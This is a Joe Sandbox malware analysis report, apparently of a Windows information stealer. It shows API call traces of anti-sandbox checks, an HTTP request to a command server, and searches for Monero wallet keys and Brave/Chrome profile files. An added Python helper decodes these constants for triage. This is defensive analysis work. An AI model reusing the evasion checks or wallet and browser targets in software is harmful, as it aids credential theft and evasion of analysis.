                                     [Graph rendering not reproduced: basic blocks e17a0-e19cd; the entry block e17a0-e17cd calls StrCmpCA and either reaches ExitProcess (e17cf-e17d1) or enters a loop of StrCmpCA comparisons (e17d7-e19cd).]
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 000E17C5
                                    • ExitProcess.KERNEL32 ref: 000E17D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 3ca825f0c68b519c73c3c305dacf8338ddc0febe8c2810afba478049ae5821c9
                                    • Instruction ID: bd370d988abb565da1664563e97efa630b5e446aada05f84343c3c93ad80a4a7
                                    • Opcode Fuzzy Hash: 3ca825f0c68b519c73c3c305dacf8338ddc0febe8c2810afba478049ae5821c9
                                    • Instruction Fuzzy Hash: 5D516BB4A04249EFDB14DFA2D954BFE77B9BF88704F108048E506BB252D770E941DB62

                                     Control-flow Graph

                                     • Executed
                                     • Not Executed
                                     [Graph rendering not reproduced: basic blocks e7500-e768e; GetWindowsDirectoryA and GetVolumeInformationA, then GetProcessHeap/RtlAllocateHeap and wsprintfA.]
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 000E7542
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000E757F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7603
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E760A
                                    • wsprintfA.USER32 ref: 000E7640
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 1544550907-3809124531
                                    • Opcode ID: bcf8b8ed3448a70007502419345c02ba1a40720f48ff9b232260a13c64953a56
                                    • Instruction ID: f14122c06a0b19444474fb96f9768229cbd03cf5f93a44445cb7e41ac9c494eb
                                    • Opcode Fuzzy Hash: bcf8b8ed3448a70007502419345c02ba1a40720f48ff9b232260a13c64953a56
                                    • Instruction Fuzzy Hash: EF41C1B1D04688AFDB11DF94CC45BEEBBB8EF08704F104099F50977281DB74AA44CBA1

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B68A60), ref: 000E98A1
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B68970), ref: 000E98BA
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B689A0), ref: 000E98D2
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B68A18), ref: 000E98EA
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B688F8), ref: 000E9903
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B79278), ref: 000E991B
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B65068), ref: 000E9933
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B651C8), ref: 000E994C
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B68988), ref: 000E9964
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B68B20), ref: 000E997C
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B68850), ref: 000E9995
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B688E0), ref: 000E99AD
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B651A8), ref: 000E99C5
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B68868), ref: 000E99DE
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000D11D0: ExitProcess.KERNEL32 ref: 000D1211
                                      • Part of subcall function 000D1160: GetSystemInfo.KERNEL32(?), ref: 000D116A
                                      • Part of subcall function 000D1160: ExitProcess.KERNEL32 ref: 000D117E
                                      • Part of subcall function 000D1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 000D112B
                                      • Part of subcall function 000D1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 000D1132
                                      • Part of subcall function 000D1110: ExitProcess.KERNEL32 ref: 000D1143
                                      • Part of subcall function 000D1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 000D123E
                                      • Part of subcall function 000D1220: __aulldiv.LIBCMT ref: 000D1258
                                      • Part of subcall function 000D1220: __aulldiv.LIBCMT ref: 000D1266
                                      • Part of subcall function 000D1220: ExitProcess.KERNEL32 ref: 000D1294
                                      • Part of subcall function 000E6770: GetUserDefaultLangID.KERNEL32 ref: 000E6774
                                      • Part of subcall function 000D1190: ExitProcess.KERNEL32 ref: 000D11C6
                                      • Part of subcall function 000E7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000D11B7), ref: 000E7880
                                      • Part of subcall function 000E7850: RtlAllocateHeap.NTDLL(00000000), ref: 000E7887
                                      • Part of subcall function 000E7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 000E789F
                                      • Part of subcall function 000E78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7910
                                      • Part of subcall function 000E78E0: RtlAllocateHeap.NTDLL(00000000), ref: 000E7917
                                      • Part of subcall function 000E78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 000E792F
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00B791D8,?,000F110C,?,00000000,?,000F1110,?,00000000,000F0AEF), ref: 000E6ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 000E6AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 000E6AF9
                                    • Sleep.KERNEL32(00001770), ref: 000E6B04
                                    • CloseHandle.KERNEL32(?,00000000,?,00B791D8,?,000F110C,?,00000000,?,000F1110,?,00000000,000F0AEF), ref: 000E6B1A
                                    • ExitProcess.KERNEL32 ref: 000E6B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2525456742-0
                                    • Opcode ID: e218fc99b08e7b8dd0fb7c75b8ec06abb8128c9572ada38fe7078c1c2a5bc1d1
                                    • Instruction ID: d23b7f9570b695d01accb0d189d475de42e9fbe1c56f448f9c81506c471eb7e4
                                    • Opcode Fuzzy Hash: e218fc99b08e7b8dd0fb7c75b8ec06abb8128c9572ada38fe7078c1c2a5bc1d1
                                    • Instruction Fuzzy Hash: F0312D70A00248AEDB05F7F2ED56BEE7778AF19341F014529F212B6193DF706A05CAB6

                                     Control-flow Graph

                                     • Executed
                                     • Not Executed
                                     [Graph rendering not reproduced: basic blocks d1220-d129d; GlobalMemoryStatusEx, two calls to eda00, and a conditional ExitProcess at d1292-d1294.]
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 000D123E
                                    • __aulldiv.LIBCMT ref: 000D1258
                                    • __aulldiv.LIBCMT ref: 000D1266
                                    • ExitProcess.KERNEL32 ref: 000D1294
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 3404098578-2766056989
                                    • Opcode ID: e1936e26a24d77d172f99f00ad1bc753e573ab1daf4f724022adbc94608df616
                                    • Instruction ID: e5eb1355b65f8f9b9b04c44ac75de2183adcc4367bc883e7855f576dbc06e75b
                                    • Opcode Fuzzy Hash: e1936e26a24d77d172f99f00ad1bc753e573ab1daf4f724022adbc94608df616
                                    • Instruction Fuzzy Hash: 460162B0D40348BEDB10DBD0CC49BEDB778EB04701F248055E705B62C1DB7556418B69

                                     Control-flow Graph

                                     • Executed
                                     • Not Executed
                                     [Graph rendering not reproduced: basic blocks e6aba-e6b22; OpenEventA, then either CreateEventA or CloseHandle/Sleep looping back to e6b0a, and finally CloseHandle/ExitProcess at e6b0c-e6b22.]
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00B791D8,?,000F110C,?,00000000,?,000F1110,?,00000000,000F0AEF), ref: 000E6ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 000E6AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 000E6AF9
                                    • Sleep.KERNEL32(00001770), ref: 000E6B04
                                    • CloseHandle.KERNEL32(?,00000000,?,00B791D8,?,000F110C,?,00000000,?,000F1110,?,00000000,000F0AEF), ref: 000E6B1A
                                    • ExitProcess.KERNEL32 ref: 000E6B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: 8ab863bd307f83853906e0f4a45f4318cc96c96fc5c6feba370ba8f0fc6644cf
                                    • Instruction ID: 862da040cc6acc8b530bc1f32f4ccb6ee72f1e9afd79a9b0994d9366cefec35e
                                    • Opcode Fuzzy Hash: 8ab863bd307f83853906e0f4a45f4318cc96c96fc5c6feba370ba8f0fc6644cf
                                    • Instruction Fuzzy Hash: 29F05430A40249EFE751ABA1EC16BFE7B78FB18742F148924B512B11D2CBB15540DA57

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000D4839
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 000D4849
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: c2186418d929517f8c3001888a6fb6a06730f077e76cbb32f8855fd0f768bbd8
                                    • Instruction ID: 5755f326f3caf1c98facfdc01bf98bf44f4194b2ea0815953479cb038688bae9
                                    • Opcode Fuzzy Hash: c2186418d929517f8c3001888a6fb6a06730f077e76cbb32f8855fd0f768bbd8
                                    • Instruction Fuzzy Hash: 21214DB1D00209ABDF14DFA5E845AEE7B79FB45320F108625F925B72C1EB706A09CF91

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000D6280: InternetOpenA.WININET(000F0DFE,00000001,00000000,00000000,00000000), ref: 000D62E1
                                      • Part of subcall function 000D6280: StrCmpCA.SHLWAPI(?,00B81328), ref: 000D6303
                                      • Part of subcall function 000D6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000D6335
                                      • Part of subcall function 000D6280: HttpOpenRequestA.WININET(00000000,GET,?,00B80BD0,00000000,00000000,00400100,00000000), ref: 000D6385
                                      • Part of subcall function 000D6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000D63BF
                                      • Part of subcall function 000D6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D63D1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000E5228
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: d586ca3f3841e47ed52d517a0d27169c3880c0ac788b74b1c9dc8d6ebeffb908
                                    • Instruction ID: f058c2808098ece027fb976559ae4d0b2e7e1313dd265eef8bdee8f7299bfff3
                                    • Opcode Fuzzy Hash: d586ca3f3841e47ed52d517a0d27169c3880c0ac788b74b1c9dc8d6ebeffb908
                                    • Instruction Fuzzy Hash: AF117330A00188AFDB14FF61DD92AEC3339AF59300F404528F91A6B593EF70BB09C692
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7910
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E7917
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 000E792F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: 5e9a9348fb91cab345ac215f798c4746441a1eed2348feb5c2d6b5cb28cdf0c6
                                    • Instruction ID: 72e3fc7b9a2ffcf6cb6b4879cbd582f467be2fa831f3914b396e3dbacc61d01d
                                    • Opcode Fuzzy Hash: 5e9a9348fb91cab345ac215f798c4746441a1eed2348feb5c2d6b5cb28cdf0c6
                                    • Instruction Fuzzy Hash: 3F0181B1A04648EFC710DF99DD45BAEBBBCFB08B21F10425AFA45F3280D37459008BA2
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 000D112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 000D1132
                                    • ExitProcess.KERNEL32 ref: 000D1143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: f243118ffa3d5c16cb68c3e53295195df8420741109ae2962d8fc3d63b3d9b74
                                    • Instruction ID: 50d98dde818e9517f180fe0bb373962145c70e576c0c4c90d23dca03d3911347
                                    • Opcode Fuzzy Hash: f243118ffa3d5c16cb68c3e53295195df8420741109ae2962d8fc3d63b3d9b74
                                    • Instruction Fuzzy Hash: 83E0E670946308FBE7516BE09C0AB997ABCAB08B12F108055F709762D0DAB526419699
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 000D10B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 000D10F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: 754fd455b83e3da3bb51a9859118afa19f5977fc262f13cf3a0681f745ab7e79
                                    • Instruction ID: efa9270ee5b0e17659602d8281f9f7672b383f71b0b7c18b6d0470f9c9643740
                                    • Opcode Fuzzy Hash: 754fd455b83e3da3bb51a9859118afa19f5977fc262f13cf3a0681f745ab7e79
                                    • Instruction Fuzzy Hash: 04F0E2B1641308BBE714AAA4AC49FEABBECE709B15F304449F504E3280D9719F00CAA0
                                    APIs
                                      • Part of subcall function 000E78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7910
                                      • Part of subcall function 000E78E0: RtlAllocateHeap.NTDLL(00000000), ref: 000E7917
                                      • Part of subcall function 000E78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 000E792F
                                      • Part of subcall function 000E7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000D11B7), ref: 000E7880
                                      • Part of subcall function 000E7850: RtlAllocateHeap.NTDLL(00000000), ref: 000E7887
                                      • Part of subcall function 000E7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 000E789F
                                    • ExitProcess.KERNEL32 ref: 000D11C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: ff110d53ab24f64f0bc335539e27bc6ea18f313a2326fd595017c962e2322700
                                    • Instruction ID: f006f4bb02d1d48867624b5d3840dad4b8b1e5c2b42cf7013fe5578d3aeb8e37
                                    • Opcode Fuzzy Hash: ff110d53ab24f64f0bc335539e27bc6ea18f313a2326fd595017c962e2322700
                                    • Instruction Fuzzy Hash: EEE012B59543416BDA0173B2BD0ABEA329D5B58346F084425FA0DE2243FE25E90086B6
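The four listings above are easier to read once the raw arguments are decoded: the WinINet chain under subcall 000D6280 (InternetOpenA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, then a StrCmpCA against "ERROR"), the GetCurrentProcess/VirtualAllocExNuma/ExitProcess function at 000D112B, the VirtualAlloc/VirtualFree pair at 000D10B3, and the GetComputerNameA/GetUserNameA/ExitProcess function at 000D11C6. The Python below is an added triage helper, not Joe Sandbox code and not part of the analysed sample: it parses those listing lines (copied from the report as constructed input), decodes the documented Win32/WinINet constants, and tags the three sequences that the report's signatures describe as sandbox and emulator checks. Two readings are mine and are marked in the code: the arguments printed on the GetCurrentProcess line are treated as the stack VirtualAllocExNuma consumes (lpAddress, dwSize, flAllocationType, flProtect, nndPreferred), and the 256 MiB threshold for a "large allocation" is a heuristic cut-off, not a value from the page.

```python
"""Added triage helper: decode Joe Sandbox function API listings.

Not Joe Sandbox code and not part of the analysed sample. Constant tables
are the documented winnt.h / wininet.h values; SAMPLE_LINES is constructed
from the report listings (a blank line separates one function from the next).
"""
from __future__ import annotations
import re
from dataclasses import dataclass
from typing import Optional

SAMPLE_LINES = """\
• Part of subcall function 000D6280: InternetOpenA.WININET(000F0DFE,00000001,00000000,00000000,00000000), ref: 000D62E1
• Part of subcall function 000D6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000D6335
• Part of subcall function 000D6280: HttpOpenRequestA.WININET(00000000,GET,?,00B80BD0,00000000,00000000,00400100,00000000), ref: 000D6385
• Part of subcall function 000D6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000D63BF
• Part of subcall function 000D6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D63D1
• StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000E5228

• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 000D112B
• VirtualAllocExNuma.KERNEL32(00000000), ref: 000D1132
• ExitProcess.KERNEL32 ref: 000D1143

• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 000D10B3
• VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 000D10F7

• Part of subcall function 000E78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 000E792F
• Part of subcall function 000E7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 000E789F
• ExitProcess.KERNEL32 ref: 000D11C6
"""

LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>\w+)\.(?P<dll>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
MEM_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x8000: "MEM_RELEASE"}
PAGE_PROT = {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}
INET_FLAGS = {0x00400000: "INTERNET_FLAG_KEEP_CONNECTION", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}
INET_SERVICE = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
INET_OPTION = {0x1F: "INTERNET_OPTION_SECURITY_FLAGS"}
LARGE_ALLOC = 256 * 1024 * 1024  # heuristic cut-off chosen for this example, not from the report


@dataclass
class Call:
    api: str
    dll: str
    args: list            # int for hex words, None for '?', str for literals such as GET
    ref: int
    subcall_of: Optional[int] = None


def parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if re.fullmatch(r"[0-9A-F]{8}", tok) else tok


def parse_listing(text: str) -> list[list[Call]]:
    """Group listing lines into functions; a blank line ends a function."""
    blocks, current = [], []
    for line in text.splitlines():
        if not line.strip():
            if current:
                blocks.append(current)
                current = []
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
        current.append(Call(m["api"], m["dll"], args, int(m["ref"], 16),
                            int(m["sub"], 16) if m["sub"] else None))
    if current:
        blocks.append(current)
    return blocks


def decode_flags(value: int, table: dict) -> str:
    """Render a bit-flag word as OR-ed names, keeping any undocumented bits as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return "|".join(names) or "0"


def describe_alloc(calls: list[Call]) -> list[str]:
    """Render the memory calls with size, allocation type and protection decoded."""
    out = []
    for i, c in enumerate(calls):
        args = c.args
        # Assumption: the pushes printed on the GetCurrentProcess line are the
        # arguments of the VirtualAllocExNuma call that immediately follows it.
        if c.api == "GetCurrentProcess" and i + 1 < len(calls) and calls[i + 1].api == "VirtualAllocExNuma":
            c, args = calls[i + 1], c.args
        if c.api in ("VirtualAlloc", "VirtualAllocExNuma") and len(args) >= 4:
            out.append(f"{c.api} size={args[1]:,} type={decode_flags(args[2], MEM_TYPE)} "
                       f"prot={decode_flags(args[3], PAGE_PROT)}")
        elif c.api == "VirtualFree" and len(args) >= 3:
            out.append(f"VirtualFree size={args[1]:,} type={decode_flags(args[2], MEM_TYPE)}")
    return out


def evasion_tags(calls: list[Call]) -> list[str]:
    """Tag the sequences the report's signatures describe as analysis-environment checks."""
    apis = [c.api for c in calls]
    tags = []
    if "ExitProcess" in apis:
        before_exit = apis[:apis.index("ExitProcess")]
        if "VirtualAllocExNuma" in before_exit:
            tags.append("numa-alloc-then-exit")        # API absent on weak emulators
        if {"GetComputerNameA", "GetUserNameA"} & set(before_exit):
            tags.append("host-user-name-then-exit")    # machine/user name blocklist
    for c in calls:
        if c.api == "VirtualAlloc" and len(c.args) > 1 and isinstance(c.args[1], int) and c.args[1] >= LARGE_ALLOC:
            tags.append(f"large-alloc:{c.args[1]}")    # fails on memory-starved sandboxes
    return tags


def describe_http(calls: list[Call]) -> dict:
    """Pull the request shape out of a WinINet call chain."""
    info = {}
    for c in calls:
        a = c.args
        if c.api == "InternetConnectA" and len(a) >= 6:
            info["port"] = a[2] if isinstance(a[2], int) else "runtime value"
            info["service"] = INET_SERVICE.get(a[5], hex(a[5]) if isinstance(a[5], int) else "?")
        elif c.api == "HttpOpenRequestA" and len(a) >= 7:
            info["verb"] = a[1]
            info["flags"] = decode_flags(a[6], INET_FLAGS)
        elif c.api == "InternetSetOptionA" and len(a) >= 2:
            info["option"] = INET_OPTION.get(a[1], hex(a[1]))
        elif c.api == "StrCmpCA" and "ERROR" in a:
            info["error_marker"] = "ERROR"  # C2 reply compared against a literal ERROR
    return info


if __name__ == "__main__":
    for fn in parse_listing(SAMPLE_LINES):
        print(f"function @ {fn[0].ref:08X}")
        for line in describe_alloc(fn):
            print("  ", line)
        if describe_http(fn):
            print("  ", describe_http(fn))
        for tag in evasion_tags(fn):
            print("   evasion:", tag)
```

Run stand-alone it shows that 17C841C0 is exactly 399,000,000 bytes committed as PAGE_READWRITE and released with MEM_RELEASE, that the NUMA allocation is a 2,000-byte PAGE_EXECUTE_READWRITE probe, and that the request is a GET with INTERNET_FLAG_KEEP_CONNECTION|INTERNET_FLAG_PRAGMA_NOCACHE over INTERNET_SERVICE_HTTP with option 0x1F (INTERNET_OPTION_SECURITY_FLAGS) set; the 4-byte option value and the port are printed as "?" in the listing, so whether certificate checks are relaxed cannot be read from this page.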
                                    APIs
                                    • wsprintfA.USER32 ref: 000E38CC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000E38E3
                                    • lstrcat.KERNEL32(?,?), ref: 000E3935
                                    • StrCmpCA.SHLWAPI(?,000F0F70), ref: 000E3947
                                    • StrCmpCA.SHLWAPI(?,000F0F74), ref: 000E395D
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000E3C67
                                    • FindClose.KERNEL32(000000FF), ref: 000E3C7C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: 8bd58f9f1265c50974e80a1ff51cdf1b8a5ec9838441c5296a2157b2200f03f3
                                    • Instruction ID: 2058ae3909816484c4836b80336f5cab61942bbff664657c9a4831b578a9c45d
                                    • Opcode Fuzzy Hash: 8bd58f9f1265c50974e80a1ff51cdf1b8a5ec9838441c5296a2157b2200f03f3
                                    • Instruction Fuzzy Hash: AEA152B1900248AFDB25DFA5DC89FFE777CBB48301F048598A60DA6142DB759B84CF62
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    • FindFirstFileA.KERNEL32(00000000,?,000F0B32,000F0B2B,00000000,?,?,?,000F13F4,000F0B2A), ref: 000DBEF5
                                    • StrCmpCA.SHLWAPI(?,000F13F8), ref: 000DBF4D
                                    • StrCmpCA.SHLWAPI(?,000F13FC), ref: 000DBF63
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000DC7BF
                                    • FindClose.KERNEL32(000000FF), ref: 000DC7D1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-726946144
                                    • Opcode ID: a813f196920174c532dc9f4bd8118fb8112a79f5b34ba670f630d2a924ad9ce3
                                    • Instruction ID: fafd5f6d9c692211df66181cdd0679c822c51a6fbc76988b1520cf78892ebf17
                                    • Opcode Fuzzy Hash: a813f196920174c532dc9f4bd8118fb8112a79f5b34ba670f630d2a924ad9ce3
                                    • Instruction Fuzzy Hash: 8642A671A00148AFDB14FB71DD96EED737DAF8D300F414559B506A6182EF30AB49CBA2
                                    APIs
                                    • wsprintfA.USER32 ref: 000E492C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000E4943
                                    • StrCmpCA.SHLWAPI(?,000F0FDC), ref: 000E4971
                                    • StrCmpCA.SHLWAPI(?,000F0FE0), ref: 000E4987
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000E4B7D
                                    • FindClose.KERNEL32(000000FF), ref: 000E4B92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
